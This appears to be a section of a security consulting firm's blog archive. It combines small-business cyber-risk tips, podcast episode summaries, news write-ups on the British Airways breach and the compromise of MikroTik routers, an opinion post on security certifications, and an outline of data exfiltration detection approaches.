Work with your banks or card processors to ensure the most trusted and validated tools and anti-fraud services are being used. You may also have additional security obligations related to agreements with your bank or processor. Isolate payment systems from other, less secure programs and do not use the same computer to process payments and surf the Internet.

9) Make Backup Copies of Important Business Data and Use Encryption When Possible.

Regularly backup the data on all computers. Critical data includes word processing documents, electronic spreadsheets, databases, financial files, human resources files, and accounts receivable/payable files. Backup data automatically if possible, or at least weekly, and store the copies either offsite or on the cloud.

10) Control Physical Access to Computers and Network Components.

Prevent access or use of business computers by unauthorized individuals. Laptops can be particularly easy targets for theft or can be lost, so lock them up when unattended. Make sure a separate user account is created for each employee and require strong passwords. Administrative privileges should only be given to trusted IT staff and key personnel.

11) Create A Mobile Device Protection Plan.

Require users to password protect their devices, encrypt their data, and install security apps to prevent criminals from stealing information while the phone is on public networks. Use a containerization application to separate personal data from company data. Be sure to set reporting procedures for lost or stolen equipment.

12) Protect All Pages on Your Public-Facing Web-pages, Not Just the Checkout and Sign-Up Pages.

Make sure submission forms can block spam and can block code execution (cross side scripting attacks).

Contact Abstract Forward here for more info.

Abstract Forward Podcast #4: Network Scanning Tips With Chip Harris.

Chip Harris.jpgIn this episode, we have a deep conversation with CISO Consultant Chip Harris. We start with an overview of network scanning, both free open source tools like OpenVAS and other more costly options like Tenable. We then talk about red teaming, issues with data security lakes, the Equifax data breach, how leadership impacts security, and how threat actors are better at innovating than defenders typically are. We also cover the evolution of messaging, mobile device application hype and exploits, mobile application containerization, how the cyber kill chain came about, and a few things about the future of incident response.

Harris has an extensive background in government and business InfoSec engineering and red team planning and operations  — with over 25 years of experience designing and managing IT systems. His expertise is in identifying and solving problems by delivering projects and solutions. His experience includes serving as the IT lead and project manager within the business unit, evaluating system performance, helping business leaders and non-technical clients understand how technology can improve workflow, developing and enforcing standard IT practices, and ensuring IT compliance with regulations such as NERC CIP, PCI, GDPR, HIPAA, and SOX.

He has a Ph.D. in Cyber Security and Cyber Operations from the United States War College, a Masters in Cyber Security and Cyber Crime from the United States War College, and a Bachelors in Computer Science and Animation from Memphis College of Art. He has the following certifications: MCE, MCSE, NCE, MCSA, MCM, MCT, Security +, SUSE Novell Linux, Open SUSE Enterprise, Ubuntu Server Admin, PICK WMS, Backtrack 5, Netools 5, Dell Kace 3000 and 1000, IBM Q-Radar, Carbon Black, Tenable Security Suite, Dark Trace, Q-Radar, IBM Guardium, OWASP, Check Point, RHL, Kali Linux Certified, C|EH, C|PT, C|HFI, CCE, GIAC Rated, Barracuda, and he is even Tripwire Certified.

Fig 1. (OpenVAS Greenbone Scan Demo, 2018).
OpenVAS.png

Listen to the podcast here.


Learn more about Abstract Forward Consulting here.

Disclaimer:  This podcast does not represent the views of former or current employers and / or clients. This podcast will make every reasonable effort to verify facts and inferences therefrom. However, this podcast is intended to entertain and significantly inform its audience based on subjective reason based opinions. Non-public information will not be disclosed. Information obtained in this podcast may be materially out of date at or after the time of the podcast. This podcast is not legal, accounting, audit, health, technical, or financial advice. © Abstract Forward Consulting, LLC.

Top Ten Ways Companies Can Reduce Cyber Risk

cost-of-cyber-attacks-to-business-mq593szq6dt3vzuawhu5qtm2upt66jfkqpxzl18l8sMid-sized businesses are defined from about $50 million to $800 million in revenue. A 2017 report published by Keeper Security and the Ponemon Institute found more than 50% of small and medium business had been breached in the past 12 months, but only 14% of them rated their ability to defend against cyber-threats as “highly effective” (Keeper / Ponemon, 2017). According to the 2017 Verizon Data Breach Investigations Report, 75% of the breaches were caused by outsiders with 51% involving organized criminal groups and the remaining involved internal actors. Not surprising, malware installed via malicious email attachments was present in 50% of the breaches involving hacking(Verizon, 2017). Here are ten steps (applicable to any size business) you can take to shield your mid-sized business from cyber-attacks:

10) Train Staff Often:

Most cyber-attacks take the form of phishing and spear phishing which is hackers targeting individuals rather than computer systems – typically with the help of good social engineering (IT Governance Blog, 2017). Therefore, employees need to be educated to roll back what they share on social media and to opt out of data harvesting when they can. Training needs to be ongoing because the threat landscape and technology change so fast. For example, ransomware was not a serious attack vector 6 years ago, but it is front and center today. Additionally, crypto-currency mining networks is an exploit vector that is arguably less than 2 years old and growing rapidly. Lastly, training more often improves the company security culture and that is directly related to keeping a good business reputation and core customer base. Here are a few more training necessities:

1. Follow cyber security best practices and conduct audits on a regular basis – based on your selected one or two frameworks (Cobit 5, ISO 2700, etc)

2. Use games contest and prizes to teach cyber safety – leadership must do this as well.

3. Notify and educate staff of any current cyber-attacks – have a newsletter.

4. Teach them how to handle and protect sensitive data – do lunch and learns.

9) Secure Wireless Networks:

Wireless networks can be easily exploited by cyber attackers, unknowing guests, and even angry customers. Your network is not like a coffee shop community room but rather it’s like a bank vault with many segmented areas – map the segments and know their rank order value. To harden your wireless network, avoid WEP (Wired Equivalent Privacy) encryption (which can be cracked in minutes) and use only WPA2, which uses AES-based encryption and provides better security than WPA.

Fig 1. (WPA2 Selection Screen Clip).

wpa_top

If you have a Wi-Fi network, be sure access to the router is secured by a password and hidden so that it does not broadcast the network name. To hide your Wi-Fi network, set up your wireless access point or router so it does not broadcast the network name, known as the Service Set Identifier (SSID). Also, remember to password-protect access to the router. Additionally, for protection against brute-force attacks, protect your network with a complex passphrase containing at least 25 characters and including a mix of letters, upper and lower case and numerals and symbols. Use a firewall and encryption to safeguard your internet connection.

8) Physically Secure Your Environment:

Focusing on web tools and monitoring is needed, but it’s also important to remember there are physical concerns about securing your network as well. To a threat actor overcoming all of your security measures may be as easy as walking up to your router and pressing the reset button. Make sure that your key pieces of in-office infrastructure are secure, and that you’re monitoring them with video, sensors or other physical security controls. Make sure to be creative and thorough about how you define a physical security connection point including: doors, public lobbies, windows, air vents, turnstiles, roofs, printer room, network closet, and USB ports on machines, etc. Lastly, employees should keep their devices near them at all times.

7) Double Down on Firewalls:

While most routers have a firewall built in that can protect your internal network against outside attacks, you should know that it may not be automatically activated. It’s generally called something like SPI (stateful packet inspection) or NAT (network address translation). Either way, turn it on (Chelsea Segal, Cox Blue, 09/16/18).

It’s also important to ensure that your own software isn’t sending information out over the network or the internet without your permission. For that, you’ll want to install firewall software on your PC as well. PC Magazine’s top pick is Check Point ZoneAlarm Pro, but the default firewall that comes with Windows 8 and 10 is also a good start.

6) Evaluate Your Operational Resilience and Cyber-Security Practices Quarterly: 

A good start is the US-CERT’s Cyber Resilience Review (CRR), which helps organizations assess enterprise programs and practices across 10 domains including risk management, incident management, service continuity, and more (SBA, 2018). They can also use the CSET (Cyber Security Evaluation Tool), which is a free customizable multi-framework DHS created general cyber security assessment.

5) Review Control Access / IAM and Audit Access Regularly:

Administrative access to your systems should only be granted on a need-to-know basis – least privilege principle. The correct job roles should be in the correct windows access groups. Keep sensitive data – such as payroll – out of the hands of anyone who doesn’t need it to do their job, marketing for example. Remove unused, stale, or unnecessary IAM users/credentials. Also, consider decommissioning old systems for risk reduction and cost savings – with the appropriate project analysis done. Use a secure strong password especially for single sign on interfaces – two factor authentication. Organizations should audit their IAM user activity to see which users haven’t logged into AWS for at least 90 days and revoke their permissions. Monitor user activity in all cloud services (including IAM user activity) to identify abnormal activity indicative of threats arising from a compromised account, or malicious/negligent internal employee – when corroborated with event logs and related intelligence.

4) Back up and Secure Your Systems and Data but Don’t Over Retain:

Ransomware, or viruses used by hackers to encrypt an organization’s computer files and detain them until a ransom is paid, has emerged as a serious and growing threat to businesses worldwide, according to the FBI (FBI CISO Report 2018). Whether data is stored in the cloud, on-premises, or in a hybrid data center, businesses should back up all files to hard drives stored in a safe place outside the reach of cyberthieves. These are some key data backup subpoints.

1. Limit access to sensitive data to only a few authorized employees.

2. Encrypt all your sensitive data – do not over-classify.

3. Backup your data periodically and store it in an offsite location.

4. Protect all devices with access to your data – third party vendor implications.

5. If you accept credit cards transactions, secure each point of sale.

3) Create a Guidebook for Mobile Security:

While mobile devices allow for work anywhere, anytime, they create significant security challenges. The FCC suggests requiring users to password-protect their devices, encrypt data, and install security apps to prevent criminals from stealing information while the phone is on public networks (FCC, Feb 2018). Plus, set reporting procedures for lost or stolen mobile devices. Draft a BYOD policy that separates personal vs. corporate data and covers the below points.

1. Ensure your equipment has the latest security software and run anti-virus/malware scans regularly. If you don’t have good anti-virus software installed, buy and install it.

2. Install all software updates as soon as they are available, including all web browsers.

3. Have the latest operating systems on your devices with access to regular updates.

4. Make sure your internet connect is protected with firewall security.

5. Make sure your Wi-Fi network is encrypted, hidden, and password protected.

2) Use Encrypted Websites for E-commerce Via Strong Third-Party Risk Management Policies:

Only buy from encrypted websites by looking for https on every page. Don’t’ be teased in by super low prices or the like, it may be a drive by download set-up. Ensure that the owner of the website is reputable and is who they say they are. This kind of gets at third party and supply chain risk management, which should be based on some applicable security framework for your industry, etc.

1) Avoid When Possible and Rigorously Evaluate Freeware:

There are a lot of free options for software including anti-virus (AVG), graphic design (GIMP), marketing and sales applications, some of which are quite reliable. However, many are not reliable and pose risk because they often come with malvertising, utility ad ons that slow things down, or direct malware. All of this complicates cyber risk and blurs sight lines into the infrastructure stack. Cyber security isn’t a good place to cut costs so pay for a good antivirus and firewall tool-set. If you are going to use a robust free graphic design tool like GIMP make sure it is documented, always updated, and that it is run in a limited area.

Bonus) Have a Sound Way To Prioritize Patching.

Establish a process to risk-rate vulnerabilities based on: ease of exploit and potential impact of the vulnerability (reference the CVE scores), if other working defenses are in place, and lastly by grouping the assets they may impact.

Reach out to me here for questions.

British Airways Data Breach Likely The First GDPR Rollback Test.

On 08/21/18 British Airways (BA) suffered the start of a data breach which ended on or about 09/05/18. A UPS (uninterruptible power supply) failure and subsequent power surge was partly how the breach was exacerbated. It was also indicated that a third party (vendor) was involved in some way which complicates liability and brings supply chain security more into scope.

The breach allowed cyber criminals to steal personal and financial information from about 380,000 customers who booked directly with the airline in the preceding two weeks (Ivana Kottasová, CNN, 09/07/18). When a passenger makes a booking through the BA website, they must submit their name, e-mail address, address, and credit or debit card details including: the number, expiration date, date, and the security code or “Card Verification Value” (CVV) — all of this was compromised.

BA Breach
Photo: Steve Parsons/PA.

Yet most interestingly, this is one of the first major data breaches since GDPR came into effect in May this year, Walters said (Samuel Gibbs, the Guardian, 09/07/18). “It appears that the company notified the Information Commissioner’s Office and customers within the GDPR’s mandatory 72 hours but the breach will now be investigated and the company could be penalized if it did not take all the necessary measures to protect customer data” (Samuel Gibbs, the Guardian, 09/07/18).

The GDPR rules now in force could see a great increase in the penalties slapped on firms for past data breaches, with fines levied at a maximum of 4% of global revenues. For British Airways’ this amounts to about $630 million dollars based on last years revenue (Gwyn Topham, the Guardian, 09/06/18).

Yet many observers see fines this hefty as counterproductive and the catalyst to push business outside of the EU. Moreover, many international law firms and economists have doubts about the applicability of the GDRP outside of the EU, citing state sovereignty, and free enterprise protection in the United States, etc. The courts will likely further define the context of GRPRs applicability and may roll its reach back some. It is way to early to know what GDPR means in practicality but pushback is coming from well funded, well organized, well researched powerful law and business interest groups. GDPR is dangerously overbroad and ambiguous as echoed in this law firm newsletter (Wendy Butler Curtis and Jeffrey McKenn, Orrick, Herrington & Sutcliffe LLP, 09/09/18). We welcome the debate for a better more modern GDPR.

Thousands of MikroTik Routers Hacked to Spy On Network Traffic

router-hacking.pngAt present more than 7,500 Mikrotik routers have been compromised with malware when attackers configured the devices to forward network traffic to a handful of IP addresses under their control (Shaun Nichols, The Register, 09/04/18). According to Chinese cyber research firm 360 Netlab the attackers obtained access to the devices by exploiting CVE (Common Vulnerabilities and Exposures) 2018-14847. Ironically this vulnerability had a patch available since April 2018.

This vulnerability is associated with Any Directory File Read (CVE-2018-14847) in MikroTik routers which was found as exploitable by the CIA Vault 7 hacking tool identified as Chimay Red, along with another MikroTik’s Webfig remote code execution vulnerability.

Since 08/24/18 the 360 Netlab honeypot network had picked up on more than 5 million devices with an open TCP/8291 port worldwide, of which 1.2 million are MikroTik devices. Out of those, about 31 percent, or 370,000, are vulnerable to the flaw (Tara Seals, Threatpost, 09/04/18).

The infection does not appear to be targeting any country, as the hacked devices reside across five different continents with Russia, Iran, Brazil, and India being the most commonly impacted. The top 10 countries with compromised MickroTik routers are (Ms. Smith, CSO Online, 09/04/18).

  1. 1,628 in Russia
  2. 637 in Iran
  3. 615 in Brazil
  4. 594 in India
  5. 544 in Ukraine
  6. 375 in Bangladesh
  7. 364 in Indonesia
  8. 218 in Ecuador
  9. 191 in the US
  10. 189 in Argentina

The researchers noted that the malware is also resilient to reboots, leaving a firmware update as the only permanent solution to the problem (Shaun Nichols, The Register, 09/04/18). “In order for the attacker to gain control even after device reboot (IP change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL,” Netlab writes.

Also, the attackers seek to infect victims with the browser-based Coinhive cryptomining script (Fig. 1). They achieve this by redirecting the HTTP proxy settings to an error page they created, where they placed the mining script. “By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users’ devices,” 360 Netlab researchers indicated.

Hive

However, the attackers made a mistake when they set up proxy access control lists that block all external web resources, including those required for the mining operation (Fig. 1).

360 Netlab says it does not know what the ultimate goal of the attacker will be. Their analysis shows that the attacker is particularly interested in ports 20, 21, 25, 110, and 144, which are for FTP-data, FTP, SMTP, POP3, and IMAP traffic. An unusual interest is in traffic from SNMP (Simple Network Management Protocol) ports 161 and 162, which researchers cannot explain at the moment (Shaun Nichols, The Register, 09/04/18).

“This deserves some questions, why the attacker is paying attention to the network management protocol regular users barely use? Are they trying to monitor and capture some special users’ network SNPM community strings?” 360 Netlab asks.

Bleeping computers research recommends that MikroTik users install the latest firmware version on the device. Based on the information provided by 360 Netlab users can check if HTTP proxy, Socks4 proxy, and network traffic capture features are active and exploited by a malicious actor (Ionut Ilascu, Bleeping Computer, 09/04/18).

Reach out to my company Abstract Forward Consulting if you have questions.

In Cybersecurity There Are Two Kinds Of People: Those With Certs And Those Who Are Creative.

In cybersecurity there are two kinds of people, those with certifications and those who have proved they don’t need them. Just like degrees, certifications are only as good as the person holding them. If a person has a CISSP, a CISA, or another related certification, but does no more that attend the minimum continuing education to keep their certs in good standing, they will have little relevant security competence. Additionally, these certifications can not be compared to a CPA where the math and rules are clear and do not change at the speed of technology.

A person can show real world cybersecurity competency by building and defending websites and applications, by attending many top cybersecurity conferences and leaving some, by accurately following and blogging about threat actors (Brian Krebs), and by frequently speaking at security conferences – but more importantly their content needs to be validated by other thought leaders.

 

This is not at all to say that degrees and certifications have no value, but it is to say they are hyped up and not for everyone, especially those like Steve Jobs, Bill Gates, Larry Ellison, Mark Zuckerberg, and about 95% (est) of real hackers and technology security makers. These people are too focused on the synergies of the technology and threats “in the now” that they do not focus on memorizing things for tests that will likely become obsolete in 2-4 years anyway.

The problem with standardized tests is that they teach conformity in a limited non-real-world context based on limited information with no accurate knowledge of the future. A standardized test cannot teach or confirm creativity, quality character, incident response savvy, backwards engineering, your ability to actually build and defend an application, your ability to lead and inspire people in the right direction, stress management, and most importantly that you understand the threat actor profile and landscape and can adapt on your feet.

Many people who study for a security certification realize it’s a memorization and buzz word test. Yes, it will prove you are not a “complete moron” in security, but it will prove no more, and it has nothing to do with creativity. Yet the best security protections must be creative because the enemy is. Hackers use creativity and new technology models to break into systems in ways not thought of before. Yet before they break into these systems they have to learn and backwards engineer them. They do this with a type of intelligence and experience-based creativity that is too high for any standardized test to confirm.

If you survey all the major data breaches and hacks to find out what caused them and what could have prevented them, it is never because an organization “needed more people with standardized security certifications”. Rather, it is usually due to: lack of creativity, corporate silos, office bureaucracy, turfs wars (think why the FBI and CIA missed 9/11) poor communication, not enough real world red teaming, failure to patch, poor internet hygiene education, failure to measure and prioritize risk, and incompetent security leaders who only hire their friends or people who conform to their biases.

If you really want to learn and stay updated about cybersecurity, grab your laptop or tablet and blog real time at the Cybersecurity Summit in MN 10/22/18 to 10/24/18 – register here. Blogging is important because it makes you write down what you are learning, and your followers will force you to talk more about what your posting, so you will learn more by defended or changing it. You must be an active learner by creating and supporting the web technology behind your web-site – 100%.

Also, when attending these events don’t be like most people and hang only with your “established click”. Meet new people and be open to diverse viewpoints even ones that are hard to swallow – you grow more from that. Leave your assumptions at the door. Do not boast about the fact that you have an advanced degree or certification to someone else. You never know what the other person is capable of or has achieved. Remember most hackers and the best technology people are unorthodox.

Here is a run down of the amazing Cybersecurity Summit speakers.

  • Bruce Schneier, who will be signing copies of his forthcoming book “Click Here To Kill Everybody”
  • Chris Roberts, one of the world’s foremost experts on counter threat intelligence
  • Tony Sager, who leads the development of the CIS Critical Security Controls for the Center for Internet Security
  • Peter Brecl, Director of Managed Security Services at CenturyLink
  • Scott Borg, Director and Chief Economist at the U.S. Cyber Consequences Unit
  • Brian L. Levine, who recently engaged in the first criminal trial of a Chinese entity for trade secret theft that cost a U.S. company more than $1 billion
  • Tim Crothers, who built and leads the Cyber Fusion Center at Target

And many others!

To learn more and register for the event, go to www.cybersecuritysummit.org Register now now because prices will increase after Aug. 30. Came say hi to me at the event and reach out to my company Abstract Forward Consulting if you have questions.

Abstract Forward Podcast #1: Data Classification With Jim Danburg.

data_classification_2.jpgIn this episode, renowned governance, risk and compliance critical infrastructure security and resiliency expert Jim Danburg joins us for a candid and thought-provoking conversation on data classification, including a funny story doing a project for a CISO (chief information security officer).  More specifically, we discuss the four types of data classification vs. only three, data over-classification, data mis-classification, governance risk and compliance, data security, role based access control (RBAC), need to know policy, litigation discovery risk, the declining cost of data storage: disk vs. solid state, outsourcing data and PCI risk, mapping dependencies, the relationship between executives and data policy compliance, insider threat, bring your own device (BYOD) containerization: corporate vs. personal data with privacy implications, the secure destruction of data and hardware – and what it takes to improve all this!

Contact Abstract Forward Consulting here.

Disclaimer: This podcast does not represent the views of former or current employers and / or clients. This podcast will make every reasonable effort to verify facts and inferences therefrom. However, this podcast is intended to entertain and significantly inform its audience based on subjective reason based opinions. Non-public information will not be disclosed. Information obtained in this podcast may be materially out of date at or after the time of the podcast. This podcast is not legal, accounting, audit, health, technical, or financial advice. © Abstract Forward Consulting, LLC.

6 Pronged Approach to Data Exfiltration Detection

The best way to detect precursors to data exfiltration is to employ a six-prong detection approach applied to all risk areas as practicable. Figure 1. shows the six-pronged detection approach.

Figure 1. Six-Pronged Data Exfiltration Precursor Detection Approach [1] [2].

1) Signature Based.

Characteristics: 1) Uses known pattern matching to signify attack; 2) Former zero days, known exploits, etc.

Advantages: 1) Widely available; 2) Most antivirus is based heavily on this; 3) Fairly fast; 4) Easy to implement; 5) Easy to update.

Disadvantages: 1) Cannot detect attacks for which it has no signature – Zero days; 2) Insider threat.

2) Host Based.

Characteristics: 1) Runs on a single host; 2) Can analyze audit-trails, logs, the integrity of files and directories, etc.

Advantages: 1) More accurate than NIDS; 2) Less volume of traffic so less overhead.

Disadvantages: 1) Deployment is expensive; 2) No plan for if the host gets compromised – Real risk for organizations with more than 10 thousand employees.

3) Human Based [2].

Characteristics: 1) Has the unique experience set deriving intuition; 2) Has five senses.

Advantages: 1) Has the ability to learn multiple tools and connect the dots; 2) Can set team direction and inspire people; 3) Can think creatively; 4) Can think with the voice of the customer or recipient of a phishing e-mail.

Disadvantages: 1) Bias and ego; 2) Cannot calculate large numbers fast.

4) Anomaly Based.

Characteristics: 1) Uses statistical model or machine learning engine to characterize normal usage behaviors; 2) Requires big data and other software tools; 3) Recognizes departures from normal as potential intrusions.

Advantages: 1) Can detect attempts to exploit new and unforeseen vulnerabilities; 2) Can recognize authorized usage that falls outside the normal pattern.

Disadvantages: 1) Generally slower, more resource intensive compared to signature-based tools; 2) Greater complexity, difficult to configure; 3) Higher percentages of false alerts.

5) Network Based.

Characteristics: 1) NIDS (network intrusion detection system) examine raw packets in the network passively and triggers alerts.

Advantages 1) Easy deployment; 2) Unobtrusive; 3) Difficult to evade if done at the low level of network operation.

Disadvantages: 1) Fail Open; 2) Different hosts process packets differently; 3) NIDS needs to create traffic seen at the end host; 4) Need to have the complete network topology and complete host behavior; 5) Highly unlikely.

6) Externally Based.

Characteristics: 1) Studies show there are 258 externally measurable characteristics about network infrastructure (without any inside info).

Advantages: 1) Beaching marking – identifying mismanagement symptoms such as poorly configured DNS or BGN networks; 2) Beaching marking – identifying malicious activity which mostly includes SPAM, phishing, and port scanning; 3) One study found it to be highly reliable in predicting breaches (90% true positives in a closed limited test) [3].

Disadvantages: 1) Its low hanging fruit – easy weaknesses to spot; 2) Good I.T. audits and red teaming is similar.

[1] Dash, Debabrata. “Introduction to Network Security”. PowerPoint presentation. 2017.
[2] Photo of public figure Bruce Schneier by Per Ervland. https://www.schneier.com/ 2018.
[3] Liu, Yang; Sarabi, Armin; Zhang, Jing; Naghizadeh, Parinaz; Karir, Manish; Bailey, Michael; and Liu, Mingyan. “Cloudy with a Chance of Breach: Forecasting Cyber Security Incidents” 2015. Pg. 1.